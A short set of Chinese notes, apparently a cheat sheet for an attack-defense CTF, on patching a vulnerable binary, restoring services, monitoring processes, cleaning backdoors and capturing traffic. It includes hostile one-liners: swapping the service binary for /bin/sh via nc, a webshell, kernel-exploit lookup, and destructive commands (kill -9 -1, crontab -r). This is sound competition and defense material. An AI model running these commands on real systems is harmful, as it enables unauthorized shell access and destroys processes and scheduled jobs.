文件共享
- Samba/Win文件共享 /FTP
- 飞鸽传书
- HackMD
免密登录
vim ~/.ssh/config
ssh-keygen -t rsa
熟练使用 byotu/tmux/screen
patch
cp pwn_patched /path/to/version/pwn_0911_what_are_changes //做好版本管理
scp pwn_0911_what_are_changes ctf-pwn:/tmp/pwn_patch_newest
-
ctf@ctf-pwn$
- rm /home/pwn/pwn ;cp /tmp/pwn_patch_newest /home/pwn/pwn
- chmod +x /home/pwn/pwn
Web:直接修改
restore
- tar zxvf
privilege
- webshell
- cp pwn pwn.bak;cp /bin/sh pwn;(echo yyy|nc )
- uname -a ->4.4.0-ubuntu-136 ->db-exploit.org ->...
- mysql with root>grant select,update,delete on da....
monitor
ps -ef |grep apache2 |wc -l
while true;do ps -u pwn ;sleep(1);done
ps -o pid (执行多次对比pid值增加速度,对于某些反复启动的马)
inotify /var/www/html /tmp
clean backdoor
killall -u pwn /killall -u www-date
kill -9 -1
crontab -r
chmod 777 /path/to/backdoor.php ; rm /path/to/backdoor.php (当你没有直接权限删除的时候,先修改它的权限)
确认被提权了,申请重置
automata
- multiprocessing
- paramiko /from pwn import ssh
- flask(submit api)
easy_patch
思想:简单修改程序的逻辑或者参数,让exp失效
plt.free -> ret
sub esp,20h
mov ecx, [esp +10]
改成
sub esp,30h
mov ecx, [esp +10]
get flow
- tcpdump -i 网卡 -s 0 -w 1.pcap
- 流量转发
- ptrace
